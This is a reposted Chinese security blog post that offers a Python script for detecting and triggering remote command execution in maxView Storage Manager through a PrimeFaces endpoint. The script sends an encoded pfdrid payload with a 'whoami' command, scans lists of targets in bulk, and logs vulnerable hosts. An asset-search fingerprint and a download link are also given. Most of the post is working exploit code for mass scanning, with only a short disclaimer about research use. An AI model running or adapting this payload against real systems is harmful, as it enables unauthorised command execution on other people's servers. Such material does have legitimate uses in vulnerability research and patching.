maxView任意命令执行漏洞检测脚本

2024年10月16日09:31:50评论14 views字数 3069阅读10分13秒阅读模式

0x01 工具介绍

maxView Storage Manager使查看、监控和配置系统中基于Microsemi RAID适配器构建的所有存储变得简单。方便的图形用户界面（GUI）在Microsemi产品线和支持的操作系统（包括Windows、Linux、VMWare和Solaris）中的外观和操作都相同。使用此单一工具集中管理直连存储（DAS）和网络存储。此外，还可通过maxCache SSD Caching管理现有卷的高级缓存池，并通过Adaptec Intelligent Power Management管理存储功耗。

0x02 安装与使用

资产搜索

"maxView Storage Manager - Login"

maxView任意命令执行漏洞检测脚本

import requests
import argparse


def checkvul(url):
    # post提交数据
    data = '''pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVqupdmBV%2FKAe9gtw54DSQCl72JjEAsHTRvxAuJC%2B%2FIFzB8dhqyGafOLqDOqc4QwUqLOJ5KuwGRarsPnIcJJwQQ7fEGzDwgaD0Njf%2FcNrT5NsETV8ToCfDLgkzjKVoz1ghGlbYnrjgqWarDvBnuv%2BEo5hxA5sgRQcWsFs1aN0zI9h8ecWvxGVmreIAuWduuetMakDq7ccNwStDSn2W6c%2BGvDYH7pKUiyBaGv9gshhhVGunrKvtJmJf04rVOy%2BZLezLj6vK%2BpVFyKR7s8xN5Ol1tz%2FG0VTJWYtaIwJ8rcWJLtVeLnXMlEcKBqd4yAtVfQNLA5AYtNBHneYyGZKAGivVYteZzG1IiJBtuZjHlE3kaH2N2XDLcOJKfyM%2FcwqYIl9PUvfC2Xh63Wh4yCFKJZGA2W0bnzXs8jdjMQoiKZnZiqRyDqkr5PwWqW16%2FI7eog15OBl4Kco%2FVjHHu8Mzg5DOvNevzs7hejq6rdj4T4AEDVrPMQS0HaIH%2BN7wC8zMZWsCJkXkY8GDcnOjhiwhQEL0l68qrO%2BEb%2F60MLarNPqOIBhF3RWB25h3q3vyESuWGkcTjJLlYOxHVJh3VhCou7OICpx3NcTTdwaRLlw7sMIUbF%2FciVuZGssKeVT%2FgR3nyoGuEg3WdOdM5tLfIthl1ruwVeQ7FoUcFU6RhZd0TO88HRsYXfaaRyC5HiSzRNn2DpnyzBIaZ8GDmz8AtbXt57uuUPRgyhdbZjIJx%2FqFUj%2BDikXHLvbUMrMlNAqSFJpqoy%2FQywVdBmlVdx%2BvJelZEK%2BBwNF9J4p%2F1fQ8wJZL2LB9SnqxAKr5kdCs0H%2FvouGHAXJZ%2BJzx5gcCw5h6%2Fp3ZkZMnMhkPMGWYIhFyWSSQwm6zmSZh1vRKfGRYd36aiRKgf3AynLVfTvxqPzqFh8BJUZ5Mh3V9R6D%2FukinKlX99zSUlQaueU22fj2jCgzvbpYwBUpD6a6tEoModbqMSIr0r7kYpE3tWAaF0ww4INtv2zUoQCRKo5BqCZFyaXrLnj7oA6RGm7ziH6xlFrOxtRd%2BLylDFB3dcYIgZtZoaSMAV3pyNoOzHy%2B1UtHe1nL97jJUCjUEbIOUPn70hyab29iHYAf3%2B9h0aurkyJVR28jIQlF4nT0nZqpixP%2Fnc0zrGppyu8dFzMqSqhRJgIkRrETErXPQ9sl%2BzoSf6CNta5ssizanfqqCmbwcvJkAlnPCP5OJhVes7lKCMlGH%2BOwPjT2xMuT6zaTMu3UMXeTd7U8yImpSbwTLhqcbaygXt8hhGSn5Qr7UQymKkAZGNKHGBbHeBIrEdjnVphcw9L2BjmaE%2BlsjMhGqFH6XWP5GD8FeHFtuY8bz08F4Wjt5wAeUZQOI4rSTpzgssoS1vbjJGzFukA07ahU%3D&cmd=whoami'''
    # 头部信息
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
        'Uer-Agent': 'ua.Edge'
    }
    # 拼接漏洞地址
    url1 = url + '/maxview/manager/javax.faces.resource/dynamiccontent.properties.xhtml'
    # 验证漏洞存在与否
    try:
        filename = 'rce.txt'
        res = requests.post(url1, data=data, headers=headers, timeout=6, verify=False)
        a = res.text
        #print(a)
        if 'system' in a:
            with open(filename, 'a') as f:
                f.write(url + '\n')
                print(f'{url}存在漏洞')
        else:
            print('不存在漏洞')
    except Exception as e:
        print(f'发生错误{e}')


# 批量检测
def checkvuls(filename):
    with open(filename, 'r') as f:
        for f in f.readlines():
            checkvul(f.strip())


# banner帮助信息
def banner():
    print('-u http://www.xxx.com  即可进行单个url漏洞检测')
    print('-l targetUrl.txt  即可对选中文档中的网址进行批量检测')
    print('--help 查看更多详细帮助信息')
    print('author：yui14256')


# 主程序
def main():
    arg = argparse.ArgumentParser(description='maxView 系统dynamiccontent.properties.xhtml 远程代码执行')
    arg.add_argument('-u', help='输入需要检测的url地址')
    arg.add_argument('-l', help='输入需要批量检测的url文件')
    args = arg.parse_args()
    try:
        if args.u or args.l:
            if args.u:
                checkvul(f'{args.u}')
            else:
                checkvuls(f'{args.l}')
        else:
            banner()
    except:
        print('运行出现错误')


if __name__ == '__main__':
    main()


if __name__ == "__main__":
    main()

0x03 下载链接

https://github.com/yui14256/maxViewrce

原文始发于微信公众号（网络安全者）：maxView任意命令执行漏洞检测脚本

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

maxView任意命令执行漏洞检测脚本

Windows下完整NMAP源码编译指南

Nmap 7.96 发布，改进DNS解析速度

CAI：当前效果最好的开源AI辅助渗透测试工具

KoviD：红队 Linux 内核 rootkit

Burpsuite安装指南

Memtodesk: 获取todesk密码与解除锁屏工具

MQTT未授权访问及检测工具

红队必备神器！Invicti 25.5 更新下载

【代码审计工具】PHPAuthScanner V1.0发布

漏洞扫描工具 ThinkPHPKiller

发表评论